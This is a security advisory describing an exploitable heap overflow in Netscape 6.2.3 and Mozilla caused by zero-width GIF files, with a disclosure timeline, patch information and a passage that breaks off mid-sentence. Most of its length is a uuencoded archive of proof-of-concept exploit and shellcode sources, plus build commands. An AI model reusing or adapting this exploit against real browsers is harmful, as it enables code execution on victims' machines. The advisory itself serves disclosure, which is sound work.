|
COMMAND Mozilla/Netscape zero width GIF buffer overflow SYSTEMS AFFECTED Netscape 6.2.3 Mozilla 1.0? PROBLEM zen-parse [zen-parse@gmx.net] says : Zero width GIF file can cause exploitable heap corruption. (Or: "Why not to use a graphical browser") Vendor contacted: 17 Jul 2002 Internally patched: 19 Jul 2002 (according to changelog) Received notification of patch: 29 Aug 2002 (via email) http://crash.ihug.co.nz/~Sneuro/zerogif/ Contains an example exploit for malformed GIFs under Netscape 6.2.3 Also affects a number of other browsers, including Mozilla (of course) and manages to kill Opera. Example exploit (when it works properly) should create ~/.mashrc with a sample replacement for ~/.bashrc. Certain values in 'generic.c' and possibly other files will need changing depending on library addresses. Comments in pngshellcode.c are related to another exploit for Netscape 6.2.3... once I found one way to get data into known locations, I kept it. Certain utilities (pnmtopng and ppmtogif) called by these programs are in the netpbm-progs package. $ make pngshellcode; ./pngshellcode $ make create; ./create $ make generic; ./generic These commands will make the shellcode and the gif file. This exploit is extremely "Proof of Concept" code. Sorry about the system() calls. UUencoded archive : begin 644 how-it-works.tgz M'XL(`"HP;ST``^T:_6_;N#4_^Z_@W"4GV8I#?=M-'*P[!(<"=T/1]H=AL5'( M%&5KE25!DA.YU_SO>X^D)-M)DPW+>MA=&,@2R<?W2;X/MM6*G[+3O,B61;`N M3^/33<G#LZ-G;90ZU'==>(MV^);?OFO;GDVIY1]1T_:H>43<YV7CX;8IJZ`@ MY*C(LNHQN*?F_T];]:#]6<&#BH_8\]"@)J6>XWS3_I9C']C?M:AS1.CSD'^\ M_<'MOP[B5--[O_9(G%:$G?<(2[*2:Z8.GYLTB=//6G\=Y%&<\%&>K_LXGN4\ MW1\U/->@GD=Q-B\`5:3UWWG$<CUBPJ\[2\7"*"LT-J7G[`)FSMEPJ/<(D&Z7 M'#/\ZQL,_W#!7>^N]UNKZ'?='C[_/&7/=?B/GCS_<-8/_;_C4OOE_'^/UF,K M$/\V**_GTUY_5O-H5B_XK`["61W"VPQF-:/PJ+=ISFK+FM6V/:L=9U:/Q[/: M]V>UY\UJU^V_H'A6%.<]],I@G82GX#9[G;<69F/7X$;GU_;\7+GO#0*)SQK> M>Z[8%,ZX<\4*:5D5\-*@U_CG&G#4%W+ZO!Y.;>6C!<6;:P>)26K9)JV,"'Y# M018FZ7R*6ZD>TKD<,)L!4PU8S8"E!NRY7!Q'&MM<`G\Z$B,Y+PI@IA\%$&)" MDJ5`+LD*B#D&X77.6<7#UT(0`OVXD@$+X@61009YPT"#[PNVD1\BW@AAD-R? M0/:4K7/MQCAAUP)@KB.`A+@7E%`\`T4R4`Q)FDCQ3=&Y4PP@;C'>4OMW4*WY MFN5;#3C9#(<P8=B-1'?2,.=L(\/FIHV;"#Q'K8.$;=?<[UI-]UZ058N-9IG1 M+)"1%S;02_#]O;>'X_^2I[R(GRL'>"K^.[9UF/_;KO\2_[]'$UX]"8HEOS:M M,5AC+F-.=-Y[%?(H3CGY^.;]3U<?B49KAYH3'V#(V2")%VF9%\ZHS`9G9`@C M[]Y_^B5(DHQ!G]9HUXGE4[U%\_[JW<]O?KR".<=\\U=*W2M81/KEBB<)RT+> M)X.SGJ`=IS=:N<H*"#$BUA6\VA2I*$[4IZ:Q$UI'D7YQ,=:_-CU*]<O+,3@O M\%TW61R2,&.:$'`@$=T6<<6U"(H+$2T>[0(2@2,(0TTP5;=Q=Y!/!=J!?A)C MG$4R)SEX4KWKF+L=:[=CSR5V(6I08-X%>&EM6K8#)\$TL#/V/=?U_+'HP/FQ MJ$T=V7'@TZ(2S#0MRX9E[1J)@-X!A?W*;CNUFLR@S1&^3"D(6\9?SE4^L>)! MR(MK4^P"(H&*>CH9.&I%L16AKHDD]?0X!,S'(>041FUL4<I234I<!J8>Q^:? M0W)LP8],/XRB-HKM;H$9KY=F6UT^.!A-9='9#JJ*T\%)#+A:-#1UO4L%&FLJ M/E2>(WLZ`J!A:6U1S_4F$HT:X;[O11YO1^Y]R`-Q:EK-@-K:^Q5N40^*[4Z- MVZ*X:VKL2.AK6U9\K?5!IBI;QA$Y+7'GGT*F0W8J;'+12$XNJW5NC@!T3S'M MH$&_I1+(,$I>:>*T&]20YUWP$'^9%J`94)><[*9V.-VSRR'Y=O`INPSDT8:S M([V.-Y_B>:\?FAO+.=PJ/?`5X!_N@<"!L$WK$1P"P.D023S=_I`"@P;VI?VC M9#X/Q_\\7;9^^;]/`IZ(_^"T_(/X[SF6]1+_OT>#XP".'GX^KN*2J'T`CN<S M+XE%G3'$?(CWPN^@*S)(D(90BJ4WO*A*$F.PKC(2"!0W00(!$_9.`UI@$40L MZS/)"E)F(_*V`B_"LG5>\+($"K`4-J!8'&V2A%B.ZWM(<+&M8#J+2!A4@4%N M5S%;D7P#F[+$%>C*LF)+BB!=\E*L#Q@#G/$BX5#:;LDF'XU&*$<,[$#*8<D_ M$B@NP1LC#R.Q5BF`%QQXYL0B>8#22>Y(O`Z67(CT6@`24T=@TIT0J3S\)/`N MXCR'DC5(UEE907$:L"K9DJC(UG(Y-$3[3]AV4,DF&2I1D$"M%R!L7*T$1);" MNG46QE',@BK.TK)%L.`H5\<=^"].L(J71L,?79@*05)>5Z2$DAE02(&)I9,W M,NTCZ6:]X`7J.L_`F+QH!3\4,"Y;:XGZ&)0$`T$%'(/M%J"\JM'KCLI'4KWJ M]P/GN$-8$92K$<-P25;9+;GE9,FK74,!#X`1O1$!J8*&.8D%MQSLF+05"3RZ M;&=G;=IZ]>'CV[_]M#-R]?>K'WMM/OKA[3^(9@]050/<Y'I/WH4-%AM(?N4W M"M]<C"UF-;74.X3W>%9'$WBB[IG0;SWB,@@_75@V!A0FOMU9'<*W[W:H(SZK M;5..CR<2;L%@3J)H*"TB.<T]^$:.8(D#H`Z,.\"=`V,.EZ0HH@18MA`HD!HR MCLM:<!BS\>W)9W\9K'&@[R!*@0(Q([,<F&8^3'GW;[K&>+/%[X\[GD3A[5!# M-?K[E,=`C4TZ;ALR5H1H!0H/,'KF/BI\&E#?AGF\3P,N/?L03J#X3YE'R^"U MG7A/!`IA+$L)L9!JHGB[!TO&M%LBQETYQI!K$V_Y!`JDQ@#%@DI#-DL1)4-F MJ=PKB`8M8?I2_7B9Z$HN!'6[XV8!CWM(W=E'W<`SN;4$B'>?<:3>C.&FY^;^ MIK=L5+6T2*2L`LQ:5&D>Y035>4XWCW-HD19>6%*B4*!H/%2CKY;A/O"407$Y M[@/?D^B1C.@[[;[P%8A8ZBNTKD2-AO6H&A\K+DS%A50G3B-U7.(CR$2=`>1( MC2-*2Y%JN!!;3M[\"AD?HHZ4)YU0R$WST*#?>![TH^*N=;^,B[#,,KX84&(8 M652*H@[\55./KD4!KH%K:])OF-Q)OIL4OA1>_;"VZD8QB8>,32&)IM-3\X'2 M2OP+'[A/(G($5=N9/H"\BJ,4W&SK@YO2`[@Q?OC+#X9D4%9+6ZB6MA>(YWS; M%DO=1;3TT'@1;>U>WFKUQ<2E^M>O6GT)Y;&CZX#[NA[:@ZU8,)]2."/-E3!4 M?WBW>H(P"#W4&CA];J#4ZL;S[`SJ!]`S5`]H`,`10EFTX#P2E<7>C&,&"TA> MN2KZ0`94P^,R=/?/DML=-J;"XF#3X5#<C$-`+H^G3GL%W'O%DY+O:9+6C"E5 MON(II`F]/4%AYE13=:^0$0JQ3MK&B(A([9>N^FGL)R(FI"Z<(T&U'=J*-86* M%;.]BW;CD$OUF2[[>)7^*]FY=T90\1\+(&83>:^O_BUBYP;_[EN[5(G_Z5-0 MKC]]TOJ@B>PF03T:QSRH@7O8^V0@O_L[*FG(?VBR&0(*65:KUT3>6^QJ2.^N ;F*BX1OJMT_.7]M)>VDO[G[5_`4]DH`P`*``` ` end 2457 bytes SOLUTION This issue is patched in Netscape 7.0 and latest version of Mozilla. There are a few other exploitable issues patched in Netscape 6.2.3 relating to other image formats. I expect (hope for?) an advisory from Netscape at some point soon for